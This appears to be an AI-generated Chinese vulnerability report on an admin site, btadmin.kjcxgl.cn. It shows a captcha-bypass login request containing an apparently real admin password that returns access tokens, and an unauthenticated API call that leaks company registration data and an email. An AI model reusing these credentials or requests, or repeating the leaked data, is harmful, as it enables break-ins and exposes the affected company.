| 编号 | 漏洞标题 | 危险等级 | 漏洞类型 | 置信度 | 目标地址 | |
|---|---|---|---|---|---|---|
| VUL-001 | 验证码未在服务端强制校验 | 高危 | 未分类 | confirmed | https://btadmin.kjcxgl.cn/api/v1/user/sign-in |
▼ |
|
漏洞描述
登录接口 /api/v1/user/sign-in 接受空的 graph_code 参数,验证码仅在前端校验,服务端未验证。攻击者可绕过验证码进行暴力破解。
HTTP 交互记录
空验证码登录请求
REQUEST
POST https://btadmin.kjcxgl.cn/api/v1/user/sign-in Content-Type: application/json {"account": "admin", "password": "KJJjhc@123", "graph_code": "", "key": "eyJpdi...IiJ9"}
RESPONSE
HTTP/1.1 200 {"data": {"token": "eyJ0eX...MhpA", "access_token": "eyJ0eX...MhpA", "id": 1, "role": 1}, "error_msg": "", "code": 20000}
修复建议
|
||||||
| VUL-002 | API接口未授权访问 | 中危 | 访问控制缺陷 | confirmed | https://btadmin.kjcxgl.cn/ |
▼ |
|
漏洞描述
以下API接口无需认证即可访问,泄露系统信息:/api/v1/user-company/graph-code, /api/v1/user-company/getStudyCompany
HTTP 交互记录
未授权API访问测试
REQUEST
POST https://btadmin.kjcxgl.cn/api/v1/user-company/graph-code Content-Type: application/json {}
RESPONSE
HTTP/1.1 200 {"data":{"current_page":1,"data":[{"id":6,"user_company_id":10,"company_name":"\u5305\u5934\u957f\u5b89\u6c38\u78c1\u7535\u673a\u6709\u9650\u516c\u53f8","credit_code":"9115029123989697XH","company_type":1,"company_region":11,"detailed_address":"\u5bcc\u5f3a\u5357\u8def169\u53f7","company_phone":null,"postcode":"014030","company_email":"363704802@qq.com","valid_documentation_location":"https:\/\/bt.kjcxgl.cn\/\/api\/v1\/..\/..\/company\/license\/2020-05-15\/2020-05-15-09-32-588XlHy.jpg","person_n
修复建议
|
||||||
重要声明
本报告由人工智能辅助安全评估系统自动生成。尽管本系统采用了行业标准的漏洞检测方法和验证流程, 但基于自动化测试的固有局限性,报告中的发现可能存在误报、漏报或上下文理解偏差。
使用本报告的各方应注意以下事项:
本报告仅供参考,最终安全决策应由具备专业知识的安全团队做出。